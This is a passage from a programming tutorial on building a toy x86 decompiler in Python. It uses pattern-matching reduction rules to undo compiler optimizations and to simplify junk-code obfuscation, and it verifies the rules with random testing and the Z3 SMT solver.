{'A': 4, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 4) * 2) -> (arg1 * 8)
going to reduce (arg1 * 8)
...
result=(arg1 * 8)

The dictionary has the keys we supplied plus the expressions the matcher found. We can then use them to create a new expression and return it. The two numbers are just multiplied while forming the second operand to the "*" operation.

Now a real-world optimization technique: optimizing GCC replaces multiplication by 31 with shift and subtraction operations:

mov rax, rdi
sal rax, 5
sub rax, rdi

Without reduction functions, our decompiler would translate this into ((arg1 << 5) - arg1). We can replace shifting left by multiplication:

# X<<n -> X*(2^n)
def reduce_SHL1 (expr):
    m=match (expr, create_binary_expr ("<<", bind_expr ("X"), bind_value ("Y")))
    if m==None:
        return expr # no match
    return dbg_print_reduced_expr ("reduce_SHL1", expr, create_binary_expr ("*", m["X"], create_val_expr (1<<m["Y"])))

# X*n - X -> X*(n-1)
def reduce_SUB3 (expr):
    m=match (expr, create_binary_expr ("-",
        create_binary_expr ("*", bind_expr("X1"), bind_value ("N")),
        bind_expr("X2")))
    if m!=None and match (m["X1"], m["X2"])!=None:
        return dbg_print_reduced_expr ("reduce_SUB3", expr, create_binary_expr ("*", m["X1"], create_val_expr (m["N"]-1)))
    else:
        return expr # no match

The matcher will return two X's, and we must make sure that they are equal.
In fact, in previous versions of this toy decompiler, I did the comparison with plain "==", and it worked. But we can reuse the match() function for the same purpose, because it processes commutative operations better. For example, if X1 is "Q+1" and X2 is "1+Q", the expressions are equal, but plain "==" will not work. On the other hand, when the match() function encounters a "+" operation (or another commutative operation) and the comparison fails, it will also try the swapped operands and compare again. However, to make this easier to understand, you can for a moment imagine there is "==" instead of the second match().

Anyway, here is what we've got:

working out tests/mul31_GCC.s
going to reduce ((arg1 << 5) - arg1)
reduction in reduce_SHL1() (arg1 << 5) -> (arg1 * 32)
reduction in reduce_SUB3() ((arg1 * 32) - arg1) -> (arg1 * 31)
going to reduce (arg1 * 31)
...
result=(arg1 * 31)

Another optimization technique is often seen in ARM Thumb code: AND-ing a value with a constant like 0xFFFFFFF0 is implemented using shifts:

mov rax, rdi
shr rax, 4
shl rax, 4

This code is quite common in ARM Thumb code, because it's a headache to encode a 32-bit constant using a couple of 16-bit Thumb instructions, while a single 16-bit instruction can shift by 4 bits left or right.

Also, the expression (x>>4)<<4 can jokingly be called the "twitching operator": I've heard the "--i++" expression was called like this in Russian-speaking social networks, it was some kind of meme ("operator podergivaniya").

Anyway, these reduction functions will be used:

# X>>n -> X / (2^n)
def reduce_SHR2 (expr):
    m=match(expr, create_binary_expr(">>", bind_expr("X"), bind_value("Y")))
    if m==None or m["Y"]>=64:
        return expr # no match
    return dbg_print_reduced_expr ("reduce_SHR2", expr, create_binary_expr ("/", m["X"], create_val_expr (1<<m["Y"])))

# X<<n -> X*(2^n)
def reduce_SHL1 (expr):
    m=match (expr, create_binary_expr ("<<", bind_expr ("X"), bind_value ("Y")))
    if m==None:
        return expr # no match
    return dbg_print_reduced_expr ("reduce_SHL1", expr, create_binary_expr ("*", m["X"], create_val_expr (1<<m["Y"])))

# (X / (2^n)) * (2^n) -> X & (~((2^n)-1))
def reduce_MUL2 (expr):
    m=match(expr, create_binary_expr ("*",
        create_binary_expr ("/", bind_expr("X"), bind_value("N1")),
        bind_value("N2")))
    if m==None or m["N1"]!=m["N2"] or is_2n(m["N1"])==False: # short-circuit expression
        return expr # no match
    return dbg_print_reduced_expr("reduce_MUL2", expr, create_binary_expr ("&", m["X"],
        create_val_expr((~(m["N1"]-1))&0xffffffffffffffff)))

Now the result:

working out tests/AND_by_shifts2.s
going to reduce ((arg1 >> 4) << 4)
reduction in reduce_SHR2() (arg1 >> 4) -> (arg1 / 16)
reduction in reduce_SHL1() ((arg1 / 16) << 4) -> ((arg1 / 16) * 16)
reduction in reduce_MUL2() ((arg1 / 16) * 16) -> (arg1 & 0xfffffffffffffff0)
going to reduce (arg1 & 0xfffffffffffffff0)
...
result=(arg1 & 0xfffffffffffffff0)

7.4.1 Division using multiplication

Division is often replaced by multiplication for performance reasons.

From school-level arithmetics, we can remember that division by 3 can be replaced by multiplication by 1/3. In fact, compilers sometimes do so for floating-point arithmetic; for example, the FDIV instruction in x86 code can be replaced by FMUL. At least MSVC 6.0 replaces division by 3 with multiplication by 1/3, and sometimes it's hard to be sure what operation was in the original source code.

But when we operate over integer values and CPU registers, we can't use fractions. However, we can rework the fraction:

result = x/3 = x * (1/3) = x * (1*MagicNumber)/(3*MagicNumber)

Given the fact that division by 2^n is very fast, we now should find that MagicNumber, for which the following equation will be true: 2^n = 3*MagicNumber.
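The derivation above is easy to sanity-check with a short sketch (plain Python, separate from the toy decompiler): take MagicNumber = ceil(2^n / 3) for some n, and confirm that multiplying and shifting really equals integer division by 3. The choice n=65 here is an assumption for illustration; it happens to give the well-known constant 0xAAAAAAAAAAAAAAAB.

```python
# Sketch: check the magic-number idea for unsigned division by 3.
# With n=65, MagicNumber = ceil(2**65 / 3) = 0xAAAAAAAAAAAAAAAB,
# and (x * MagicNumber) >> 65 == x // 3 for any 64-bit unsigned x.
import random

n = 65
magic = (2**n + 1) // 3          # ceil(2**65 / 3), since 2**65 % 3 == 2
assert magic == 0xAAAAAAAAAAAAAAAB

for _ in range(100000):
    x = random.getrandbits(64)
    assert (x * magic) >> n == x // 3
print("ok")
```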
This code performs division by 10:

mov rax, rdi
movabs rdx, 0cccccccccccccccdh
mul rdx
shr rdx, 3
mov rax, rdx

The division by 2^64 is somewhat hidden: the lower 64 bits of the product in RAX are not used (dropped); only the higher 64 bits of the product (in RDX) are used, and then shifted by an additional 3 bits.

The RDX register is set during processing of MUL/IMUL like this:

def handle_unary_MUL_IMUL (registers, op1):
    op1_expr=register_or_number_in_string_to_expr (registers, op1)
    result=create_binary_expr ("*", registers["rax"], op1_expr)
    registers["rax"]=result
    registers["rdx"]=create_binary_expr (">>", result, create_val_expr(64))

In other words, the assembly code we have just seen multiplies by 0cccccccccccccccdh / 2^(64+3), or divides by 2^(64+3) / 0cccccccccccccccdh. To find the divisor, we just have to divide the numerator by the denominator.

# n = magic number
# m = shifting coefficient
# return = 1 / (n / 2^m) = 2^m / n
def get_divisor (n, m):
    return (2**float(m))/float(n)

# (X*n)>>m, where m>=64 -> X/...
def reduce_div_by_MUL (expr):
    m=match (expr, create_binary_expr(">>",
        create_binary_expr ("*", bind_expr("X"), bind_value("N")),
        bind_value("M")))
    if m==None:
        return expr # no match
    divisor=get_divisor(m["N"], m["M"])
    return dbg_print_reduced_expr ("reduce_div_by_MUL", expr, create_binary_expr ("/", m["X"], create_val_expr (int(divisor))))

This works, but we have a problem: this rule takes the (arg1*0xcccccccccccccccd)>>64 expression first and finds the divisor to be equal to 1.25. This is correct: the result is shifted by 3 more bits afterwards (or divided by 8), and 1.25*8 = 10. But our toy decompiler doesn't support real numbers.

We can solve this problem in the following way: if the divisor has a fractional part, we postpone reducing, in the hope that two subsequent right shift operations will be reduced into a single one:

# (X*n)>>m, where m>=64 -> X/...
def reduce_div_by_MUL (expr):
    m=match (expr, create_binary_expr(">>",
        create_binary_expr ("*", bind_expr("X"), bind_value("N")),
        bind_value("M")))
    if m==None:
        return expr # no match
    divisor=get_divisor(m["N"], m["M"])
    if math.floor(divisor)==divisor:
        return dbg_print_reduced_expr ("reduce_div_by_MUL", expr, create_binary_expr ("/", m["X"], create_val_expr (int(divisor))))
    else:
        print "reduce_div_by_MUL(): postponing reduction, because divisor=", divisor
        return expr

That works:

working out tests/div_by_mult10_unsigned.s
going to reduce (((arg1 * 0xcccccccccccccccd) >> 64) >> 3)
reduce_div_by_MUL(): postponing reduction, because divisor= 1.25
reduction in reduce_SHR1() (((arg1 * 0xcccccccccccccccd) >> 64) >> 3) -> ((arg1 * 0xcccccccccccccccd) >> 67)
going to reduce ((arg1 * 0xcccccccccccccccd) >> 67)
reduction in reduce_div_by_MUL() ((arg1 * 0xcccccccccccccccd) >> 67) -> (arg1 / 10)
going to reduce (arg1 / 10)
result=(arg1 / 10)

I don't know if this is the best solution. An early version of this decompiler processed the input expression in two passes: the first pass for everything except division by multiplication, and the second pass for the latter. I don't know which way is better. Or maybe we could support real numbers in expressions?

A couple of words about better understanding of division by multiplication. Many people miss the "hidden" division by 2^32 or 2^64, when the lower 32-bit (or 64-bit) part of the product is not used (or just dropped). There is also a misconception that the modular inverse is used here. This is close, but not the same thing. The extended Euclidean algorithm is usually used to find the magic coefficient, but in fact, this algorithm is rather used to solve the equation; you can solve it using any other method. Also, needless to mention, the equation is unsolvable for some divisors, because this is a diophantine equation (i.e., an equation allowing only integer results), since we work on integer CPU registers, after all.

7.5 Obfuscation/deobfuscation

Despite the simplicity of our decompiler, we can see how to deobfuscate (or optimize) code using several simple tricks.
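The brute-force check mentioned later in this chapter can also be done right here, outside the decompiler; this sketch (plain Python, independent of the toy decompiler's code) compares the reduced (arg1 / 10) against the original multiply-and-shift expression:

```python
# Sketch: confirm that the reduced expression (arg1 / 10) matches the
# original ((arg1 * 0xcccccccccccccccd) >> 67) for random 64-bit values.
import random

MAGIC = 0xcccccccccccccccd

for _ in range(100000):
    x = random.getrandbits(64)
    assert (x * MAGIC) >> 67 == x // 10
print("ok")
```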
For example, this piece of code does nothing:

mov rax, rdi
xor rax, 12345678h
xor rax, 0deadbeefh
xor rax, 12345678h
xor rax, 0deadbeefh

We would need these rules to tame it:

# (X^n)^m -> X^(n^m)
def reduce_XOR4 (expr):
    m=match(expr, create_binary_expr("^",
        create_binary_expr ("^", bind_expr("X"), bind_value("N")),
        bind_value("M")))
    if m!=None:
        return dbg_print_reduced_expr ("reduce_XOR4", expr, create_binary_expr ("^", m["X"], create_val_expr (m["N"]^m["M"])))
    else:
        return expr # no match

...
# X op 0 -> X, where op is ADD, OR, XOR, SUB
def reduce_op_0 (expr):
    # try each:
    for op in ["+", "|", "^", "-"]:
        m=match(expr, create_binary_expr(op, bind_expr("X"), create_val_expr (0)))
        if m!=None:
            return dbg_print_reduced_expr ("reduce_op_0", expr, m["X"])
    # default:
    return expr # no match

working out tests/t9_obf.s
going to reduce ((((arg1 ^ 0x12345678) ^ 0xdeadbeef) ^ 0x12345678) ^ 0xdeadbeef)
reduction in reduce_XOR4() ((arg1 ^ 0x12345678) ^ 0xdeadbeef) -> (arg1 ^ 0xcc99e897)
reduction in reduce_XOR4() ((arg1 ^ 0xcc99e897) ^ 0x12345678) -> (arg1 ^ 0xdeadbeef)
reduction in reduce_XOR4() ((arg1 ^ 0xdeadbeef) ^ 0xdeadbeef) -> (arg1 ^ 0x0)
going to reduce (arg1 ^ 0x0)
reduction in reduce_op_0() (arg1 ^ 0x0) -> arg1
going to reduce arg1
result=arg1

This piece of code can be deobfuscated (or optimized) as well:

; toggle last bit
mov rax, rdi
mov rbx, rax
mov rcx, rbx
mov rsi, rcx
xor rsi, 12345678h
xor rsi, 12345679h
mov rax, rsi

working out tests/t7_obf.s
going to reduce ((arg1 ^ 0x12345678) ^ 0x12345679)
reduction in reduce_XOR4() ((arg1 ^ 0x12345678) ^ 0x12345679) -> (arg1 ^ 1)
going to reduce (arg1 ^ 1)
result=(arg1 ^ 1)

I also used the aha! [47] superoptimizer to find weird pieces of code which do nothing. Aha! is a so-called superoptimizer: it tries various pieces of code in brute-force manner, in an attempt to find the shortest possible alternative for some mathematical operation. While sane compiler developers use superoptimizers for this task, I tried it the opposite way, to find the oddest pieces of code for some simple operations, including the NOP operation.
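Claims like "this piece of code does nothing" are cheap to double-check numerically before trusting the reduction rules; for the XOR chain above, a quick check (separate from the decompiler) is:

```python
# Sketch: the four XORs above cancel out, so the whole chain is a no-op.
import random

for _ in range(1000):
    x = random.getrandbits(64)
    assert x ^ 0x12345678 ^ 0xdeadbeef ^ 0x12345678 ^ 0xdeadbeef == x
print("ok")
```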
In the past, I've used it to find a weird alternative to the XOR operation (5.7). So here is what aha! can find for NOP:

; do nothing (as found by aha)
mov rax, rdi
and rax, rax
or rax, rax

# X & X -> X
def reduce_AND3 (expr):
    m=match (expr, create_binary_expr ("&", bind_expr ("X1"), bind_expr ("X2")))
    if m!=None and match (m["X1"], m["X2"])!=None:
        return dbg_print_reduced_expr("reduce_AND3", expr, m["X1"])
    else:
        return expr # no match

...
# X | X -> X
def reduce_OR1 (expr):
    m=match (expr, create_binary_expr ("|", bind_expr ("X1"), bind_expr ("X2")))
    if m!=None and match (m["X1"], m["X2"])!=None:
        return dbg_print_reduced_expr("reduce_OR1", expr, m["X1"])
    else:
        return expr # no match

working out tests/t11_obf.s
going to reduce ((arg1 & arg1) | (arg1 & arg1))
reduction in reduce_AND3() (arg1 & arg1) -> arg1
reduction in reduce_AND3() (arg1 & arg1) -> arg1
reduction in reduce_OR1() (arg1 | arg1) -> arg1
going to reduce arg1
result=arg1

[47] http://www.hackersdelight.org/aha/aha.pdf

This is weirder:

; do nothing (as found by aha)
;Found a 5-operation program:
; neg r1,rx
; neg r2,rx
; neg r3,r1
; or r4,rx,2
; and r5,r4,r3
; Expr: ((x | 2) & -(-(x)))
mov rax, rdi
neg rax
neg rax
or rdi, 2
and rax, rdi

Rules added (I used the "NEG" string to represent sign change, to keep it distinct from the subtraction operation, which is just minus ("-")):

# (op(op X)) -> X, where both ops are NEG or NOT
def reduce_double_NEG_or_NOT (expr):
    # try each:
    for op in ["NEG", "~"]:
        m=match (expr, create_unary_expr (op, create_unary_expr (op, bind_expr("X"))))
        if m!=None:
            return dbg_print_reduced_expr ("reduce_double_NEG_or_NOT", expr, m["X"])
    # default:
    return expr # no match

...
# X & (X | ...)
#   -> X
def reduce_AND2 (expr):
    m=match (expr, create_binary_expr ("&",
        create_binary_expr ("|", bind_expr ("X1"), bind_expr ("REST")),
        bind_expr ("X2")))
    if m!=None and match (m["X1"], m["X2"])!=None:
        return dbg_print_reduced_expr("reduce_AND2", expr, m["X1"])
    else:
        return expr # no match

going to reduce ((-(-arg1)) & (arg1 | 2))
reduction in reduce_double_NEG_or_NOT() (-(-arg1)) -> arg1
reduction in reduce_AND2() (arg1 & (arg1 | 2)) -> arg1
going to reduce arg1
result=arg1

I also forced aha! to find a piece of code which adds 2, with no addition/subtraction operations allowed:

; arg1+2, without add/sub allowed, as found by aha:
;Found a 4-operation program:
; not r1,rx
; neg r2,r1
; not r3,r2
; neg r4,r3
; Expr: -(~(-(~(x))))
mov rax, rdi
not rax
neg rax
not rax
neg rax

Rule:

# -(~X) -> X+1
def reduce_NEG_NOT (expr):
    m=match (expr, create_unary_expr ("NEG", create_unary_expr ("~", bind_expr("X"))))
    if m==None:
        return expr # no match
    return dbg_print_reduced_expr ("reduce_NEG_NOT", expr, create_binary_expr ("+", m["X"], create_val_expr(1)))

working out tests/add_by_not_neg.s
going to reduce (-(~(-(~arg1))))
reduction in reduce_NEG_NOT() (-(~arg1)) -> (arg1 + 1)
reduction in reduce_NEG_NOT() (-(~(arg1 + 1))) -> ((arg1 + 1) + 1)
reduction in reduce_ADD3() ((arg1 + 1) + 1) -> (arg1 + 2)
going to reduce (arg1 + 2)
result=(arg1 + 2)

This is an artifact of the two's complement system of signed number representation. The same can be done for subtraction (just swap the NEG and NOT operations).
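The two's complement identity behind reduce_NEG_NOT (and its subtraction twin) can be checked directly in Python, masking to 64 bits to imitate register wraparound:

```python
# Sketch: the two's-complement identities behind reduce_NEG_NOT:
#   -(~x) == x + 1   and   ~(-x) == x - 1   (modulo 2**64)
import random

MASK = 0xffffffffffffffff
for _ in range(1000):
    x = random.getrandbits(64)
    assert (-(~x)) & MASK == (x + 1) & MASK
    assert (~(-x)) & MASK == (x - 1) & MASK
print("ok")
```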
Now let's add some fake luggage to the Fahrenheit-to-Celsius example:

; celsius = 5 * (fahr-32) / 9
; fake luggage:
mov rbx, 12345h
mov rax, rdi
sub rax, 32
; fake luggage:
add rbx, rax
imul rax, 5
mov rbx, 9
idiv rbx
; fake luggage:
sub rdx, rax

It's not a problem for our decompiler, because the noise is left in the RDX register and not used at all:

working out tests/fahr_to_celsius_obf1.s
line=[mov rbx, 12345h] rcx=arg4 rsi=arg2 rbx=0x12345 rdx=arg3 rdi=arg1 rax=initial_RAX
line=[mov rax, rdi] rcx=arg4 rsi=arg2 rbx=0x12345 rdx=arg3 rdi=arg1 rax=arg1
line=[sub rax, 32] rcx=arg4 rsi=arg2 rbx=0x12345 rdx=arg3 rdi=arg1 rax=(arg1 - 32)
line=[add rbx, rax] rcx=arg4 rsi=arg2 rbx=(0x12345 + (arg1 - 32)) rdx=arg3 rdi=arg1 rax=(arg1 - 32)
line=[imul rax, 5] rcx=arg4 rsi=arg2 rbx=(0x12345 + (arg1 - 32)) rdx=arg3 rdi=arg1 rax=((arg1 - 32) * 5)
line=[mov rbx, 9] rcx=arg4 rsi=arg2 rbx=9 rdx=arg3 rdi=arg1 rax=((arg1 - 32) * 5)
line=[idiv rbx] rcx=arg4 rsi=arg2 rbx=9 rdx=(((arg1 - 32) * 5) % 9) rdi=arg1 rax=(((arg1 - 32) * 5) / 9)
line=[sub rdx, rax] rcx=arg4 rsi=arg2 rbx=9 rdx=((((arg1 - 32) * 5) % 9) - (((arg1 - 32) * 5) / 9)) rdi=arg1 rax=(((arg1 - 32) * 5) / 9)
going to reduce (((arg1 - 32) * 5) / 9)
result=(((arg1 - 32) * 5) / 9)

We can try to pretend we affect the result with the noise:

; celsius = 5 * (fahr-32) / 9
; fake luggage:
mov rbx, 12345h
mov rax, rdi
sub rax, 32
; fake luggage:
add rbx, rax
imul rax, 5
mov rbx, 9
idiv rbx
; fake luggage:
sub rdx, rax
mov rcx, rax
; OR result with garbage (result of fake luggage):
or rcx, rdx
; the following instruction shouldn't affect result:
and rax, rcx

...but in fact, it's all reduced by the reduce_AND2() function we already saw (7.5):

working out tests/fahr_to_celsius_obf2.s
going to reduce ((((arg1 - 32) * 5) / 9) & ((((arg1 - 32) * 5) / 9) | ((((arg1 - 32) * 5) % 9) - (((arg1 - 32) * 5) / 9))))
reduction in reduce_AND2() ((((arg1 - 32) * 5) / 9) & ((((arg1 - 32) * 5) / 9) | ((((arg1 - 32) * 5) % 9) - (((arg1 - 32) * 5) / 9)))) -> (((arg1 - 32) * 5) / 9)
going to reduce
(((arg1 - 32) * 5) / 9)
result=(((arg1 - 32) * 5) / 9)

We can see that deobfuscation is in fact the same thing as the optimization used in compilers. We can try this function in GCC:

int f(int a)
{
        return -(~a);
};

Optimizing GCC 5.4 (x86) generates this:

f:
        mov eax, DWORD PTR [esp+4]
        add eax, 1
        ret

GCC has its own rewriting rules, some of which are probably close to what we use here.

7.6 Tests

Despite the simplicity of the decompiler, it's still error-prone. We need to be sure that the original expression and the reduced one are equivalent to each other.

7.6.1 Evaluating expressions

First of all, we can just evaluate (or run, or execute) the expression with random values as arguments, and then compare the results.

The evaluator does arithmetical operations when possible, recursively. When any symbol is encountered, its value (randomly generated before) is taken from a table.

un_ops={"NEG":operator.neg,
        "~":operator.invert}
bin_ops={">>":operator.rshift,
        "<<":(lambda x, c: x<<(c&0x3f)), # operator.lshift should be here, but it doesn't handle too big counts
        "&":operator.and_,
        "|":operator.or_,
        "^":operator.xor,
        "+":operator.add,
        "-":operator.sub,
        "*":operator.mul,
        "/":operator.div,
        "%":operator.mod}

def eval_expr(e, symbols):
    t=get_expr_type (e)
    if t=="EXPR_SYMBOL":
        return symbols[get_symbol(e)]
    elif t=="EXPR_VALUE":
        return get_val (e)
    elif t=="EXPR_OP":
        if is_unary_op (get_op (e)):
            return un_ops[get_op(e)](eval_expr(get_op1(e), symbols))
        else:
            return bin_ops[get_op(e)](eval_expr(get_op1(e), symbols), eval_expr(get_op2(e), symbols))
    else:
        raise AssertionError

def do_selftest(old, new):
    for n in range(100):
        symbols={"arg1":random.getrandbits(64),
                 "arg2":random.getrandbits(64),
                 "arg3":random.getrandbits(64),
                 "arg4":random.getrandbits(64)}
        old_result=eval_expr (old, symbols)&0xffffffffffffffff # signed->unsigned
        new_result=eval_expr (new, symbols)&0xffffffffffffffff # signed->unsigned
        if old_result!=new_result:
            print "self-test failed"
            print "initial expression: "+expr_to_string(old)
            print "reduced expression: "+expr_to_string(new)
            print "initial expression result: ", old_result
            print "reduced expression result: ", new_result
            exit(0)

In fact, this is very close to what the LISP EVAL function does, or even a LISP interpreter. However, not all symbols are set. If the expression uses initial values from RAX or RBX (to which the symbols "initial_RAX" and "initial_RBX" are assigned), the decompiler will stop with an exception, because no random values were assigned to these registers, and these symbols are absent in the symbols dictionary.

Using this test, I've suddenly found a bug here (despite the simplicity of all these reduction rules). Well, no-one is protected from eyestrain. Nevertheless, the test has a serious problem: some bugs can be revealed only if one of the arguments is 0, or 1, or -1. Maybe even more special cases exist. The aha! superoptimizer mentioned above tries at least these values as arguments while testing:

1, 0, -1, 0x80000000, 0x7FFFFFFF, 0x80000001, 0x7FFFFFFE, 0x01234567, 0x89ABCDEF, -2, 2, -3, 3, -64, 64, -5, -31415.

Still, you cannot be sure.

7.6.2 Using Z3 SMT-solver for testing

So here we will try the Z3 SMT-solver. An SMT-solver can prove that two expressions are equivalent to each other.

For example, with the help of aha!, I've found another weird piece of code which does nothing:

; do nothing (obfuscation)
;Found a 5-operation program:
; neg r1,rx
; neg r2,r1
; sub r3,r1,3
; sub r4,r3,r1
; sub r5,r4,r3
; Expr: (((-(x) - 3) - -(x)) - (-(x) - 3))
mov rax, rdi
neg rax
mov rbx, rax ; rbx=-x
mov rcx, rbx
sub rcx, 3 ; rcx=-x-3
mov rax, rcx
sub rax, rbx ; rax=(-(x) - 3) - -(x)
sub rax, rcx

Using the toy decompiler, I've found that this piece is reduced to the arg1 expression:

working out tests/t5_obf.s
going to reduce ((((-arg1) - 3) - (-arg1)) - ((-arg1) - 3))
reduction in reduce_SUB2() ((-arg1) - 3) -> (-(arg1 + 3))
reduction in reduce_SUB5() ((-(arg1 + 3)) - (-arg1)) -> ((-(arg1 + 3)) + arg1)
reduction in reduce_SUB2() ((-arg1) - 3) -> (-(arg1 + 3))
reduction in reduce_ADD_SUB() (((-(arg1 + 3)) + arg1) - (-(arg1 + 3))) -> arg1
going to reduce arg1
result=arg1

But is it correct?
I've added a function which can output expression(s) in SMT-LIB format; it's as simple as the function which converts an expression to a string. And this is the SMT-LIB file for Z3:

(assert (forall ((arg1 (_ BitVec 64)) (arg2 (_ BitVec 64)) (arg3 (_ BitVec 64)) (arg4 (_ BitVec 64)))
    (= (bvsub (bvsub (bvsub (bvneg arg1) #x0000000000000003) (bvneg arg1)) (bvsub (bvneg arg1) #x0000000000000003))
        arg1
    )
))
(check-sat)

In plain English terms, we are asking it to make sure that for all four 64-bit arguments, the two expressions are equivalent (the second is just arg1).

The syntax may be hard to understand, but in fact, it is very close to LISP, and the arithmetical operations are named "bvsub", "bvadd", etc., because "bv" stands for bit vector.

While running, Z3 shows "sat", meaning "satisfiable". In other words, Z3 couldn't find a counterexample for this expression.

In fact, I can rewrite this expression in the form expr1 != expr2, and then we would ask Z3 to find at least one set of input arguments for which the expressions are not equal to each other:

(declare-const arg1 (_ BitVec 64))
(declare-const arg2 (_ BitVec 64))
(declare-const arg3 (_ BitVec 64))
(declare-const arg4 (_ BitVec 64))
(assert (not
    (= (bvsub (bvsub (bvsub (bvneg arg1) #x0000000000000003) (bvneg arg1)) (bvsub (bvneg arg1) #x0000000000000003))
        arg1
    )
))
(check-sat)

Z3 says "unsat", meaning it couldn't find any such counterexample. In other words, for all possible input arguments, the results of these two expressions are always equal to each other.

Nevertheless, Z3 is not omnipotent. It fails to prove the equivalence of the code which performs division by multiplication. First of all, I extended it so both results will have a size of 128 bits instead of 64:

(declare-const x (_ BitVec 64))
(assert (forall ((x (_ BitVec 64)))
    (= ((_ zero_extend 64) (bvudiv x (_ bv17 64)))
       (bvlshr (bvmul ((_ zero_extend 64) x) #x0000000000000000f0f0f0f0f0f0f0f1) (_ bv68 128))
    )
))
(check-sat)
(get-model)

(bv17 is just the 64-bit number 17, etc. "bv" stands for "bit vector", as opposed to an integer value.)

Z3 worked for too long without any answer, and I had to interrupt it.
As the Z3 developers mentioned, such expressions are hard for Z3 so far: https://github.com/Z3Prover/z3/issues/514. Still, division by multiplication can be tested using the previously described brute-force check.

7.7 My other implementations of the toy decompiler

When I made an attempt to write it in C++, of course, a node in an expression was represented using a class. There is also an implementation in pure C [48], where a node is represented using a structure.

The matchers in both C++ and C versions don't return any dictionary; instead, the bind_value() functions take a pointer to a variable which will contain the value after successful matching. bind_expr() takes a pointer to a pointer, which will point to the part of the expression, again, in case of success. I took this idea from LLVM. Here are two pieces of code from the LLVM source code with a couple of reducing rules:

// (X >> A) << A -> X
Value *X;
if (match(Op0, m_Exact(m_Shr(m_Value(X), m_Specific(Op1)))))
    return X;

(lib/Analysis/InstructionSimplify.cpp)

// (A | B) | C and A | (B | C) -> bswap if possible.
// (A >> B) | (C << D) and (A << B) | (B >> C) -> bswap if possible.
if (match(Op0, m_Or(m_Value(), m_Value())) ||
    match(Op1, m_Or(m_Value(), m_Value())) ||
    (match(Op0, m_LogicalShift(m_Value(), m_Value())) &&
     match(Op1, m_LogicalShift(m_Value(), m_Value())))) {
    if (Instruction *BSwap = MatchBSwap(I))
        return BSwap;

(lib/Transforms/InstCombine/InstCombineAndOrXor.cpp)

As you can see, my matcher tries to mimic LLVM's. What I call reduction is called folding in LLVM. Both terms are popular. I also have a blog post about the LLVM obfuscator, in which the LLVM matcher is mentioned: https://yurichev.com/blog/llvm/.

The Python version of the toy decompiler uses strings in places where an enumerated data type is used in the C version (like OP_AND, OP_MUL, etc.) and where symbols are used in the Racket version [49] (like 'OP_DIV, etc.). This may be seen as inefficient; nevertheless, thanks to string interning, only the addresses of strings are compared in the Python version, not the strings as a whole. So strings in Python can be seen as a possible replacement for LISP symbols.
[48] https://github.com/dennis714/SAT_SMT_article/tree/master/toy_decompiler/files/C
[49] Racket is a dialect of Scheme (which is, in turn, a LISP dialect). https://github.com/dennis714/SAT_SMT_article/tree/master/toy_decompiler/files/Racket

7.7.1 Even simpler toy decompiler

Knowledge of LISP makes you understand all these things naturally, without significant effort. But back when I had no knowledge of it and still tried to make a simple toy decompiler, I made it using plain text strings which held the expression for each register (and even memory).

So when a MOV instruction copies a value from one register to another, we just copy the string. When an arithmetical instruction occurs, we do string concatenation:

std::string registers[TOTAL];

...

// all 3 arguments are strings
switch (ins, op1, op2)
{
...
case ADD:
    registers[op1]="(" + registers[op1] + " + " + registers[op2] + ")";
    break;
...
case MUL:
    registers[op1]="(" + registers[op1] + " * " + registers[op2] + ")";
    break;
...
}

Now you'll have long expressions for each register, represented as strings. For reducing them, you can use a plain simple regular expression matcher.

For example, for the rule (X*n)+(X*m) -> X*(n+m), you can match a (sub)string using the following regular expression: ((.*)*(.*))+((.*)*(.*)) [50]. If the string is matched, you get 4 groups (or substrings). You then just compare the 1st and 3rd using a string comparison function, then you check whether the 2nd and 4th are numbers, you convert them to numbers, sum them, and you make a new string consisting of the 1st group and the sum, like this: (" + X + "*" + (int(n) + int(m)) + ").

It was naïve and clumsy, it was a source of great embarrassment, but it worked correctly.

7.8 Difference between a toy decompiler and a commercial-grade one

Perhaps someone currently reading this text may rush into extending my source code. As an exercise, I would say that the first step could be support of partial registers, i.e., AL, AX, EAX. This is tricky, but doable. Another task may be support of FPU [51] x86 instructions (FPU stack modeling isn't a big deal).

The gap between a toy decompiler and a commercial decompiler like Hex-Rays is still enormous.
Several tricky problems must be solved, at least these:

• C data types: arrays, structures, pointers, etc. This problem is virtually non-existent for JVM [52] (Java, etc.) and .NET decompilers, because type information is present in the binary files.
• Basic blocks, C/C++ statements. Mike Van Emmerik in his thesis [53] shows how this can be tackled using SSA forms (which are also used heavily in compilers).
• Memory support, including the local stack. Keep in mind the pointer aliasing problem. Again, decompilers of JVM and .NET files are simpler here.

7.9 Further reading

There are several interesting open-source attempts to build a decompiler. Both the source code and the theses are an interesting study.

• decomp by Jim Reuter [54].
• DCC by Cristina Cifuentes [55]. It is interesting that this decompiler supports only one type (int). Maybe this is the reason why the DCC decompiler produces source code with the .B extension? Read more about the B typeless language (a C predecessor): https://yurichev.com/blog/typeless/.

[50] This regular expression string hasn't been properly escaped, for the sake of easier readability and understanding.
[51] Floating-point unit
[52] Java Virtual Machine
[53] https://yurichev.com/mirrors/vanEmmerik_ssa.pdf
[54] http://www.program-transformation.org/Transform/DecompReadMe, http://www.program-transformation.org/Transform/DecompDecompiler
[55] http://www.program-transformation.org/Transform/DccDecompiler, thesis: https://yurichev.com/mirrors/DCC_decompilation_thesis.pdf

• Boomerang by Mike Van Emmerik, Trent Waddington et al. [56]

As I've said, LISP knowledge can help you understand all this much more easily. Here is the well-known micro-interpreter of LISP by Peter Norvig, also written in Python: https://web.archive.org/web/20161116133448/http://www.norvig.com/lispy.html, https://web.archive.org/web/20160305172301/http://norvig.com/lispy2.html.

7.10 The files

Python version and tests: https://github.com/dennis714/SAT_SMT_article/tree/master/toy_decompiler/files. There are also C and Racket versions, but they are outdated.

Keep in mind: this decompiler is still at toy level, and it was tested only on the tiny test files supplied.
8 Symbolic execution

8.1 Symbolic computation

Let's first start with symbolic computation[57].

Some numbers can only be represented in the binary system approximately, like 1/3 and π. If we calculate 1/3 · 3 step-by-step, we may suffer loss of significance. We also know that sin(π/2) = 1, but calculating this expression in the usual way, we can also get some noise in the result. Arbitrary-precision arithmetic[58] is not a solution, because these numbers cannot be stored in memory as a binary number of finite length.

How could we tackle this problem? Humans reduce such expressions using paper and pencil, without any calculations. We can mimic human behaviour programmatically if we store an expression as a tree, and symbols like π are converted into numbers only at the very last step(s).

This is what Wolfram Mathematica[59] does. Let's start it and try this:

In[]:= x + 2*8
Out[]= 16 + x

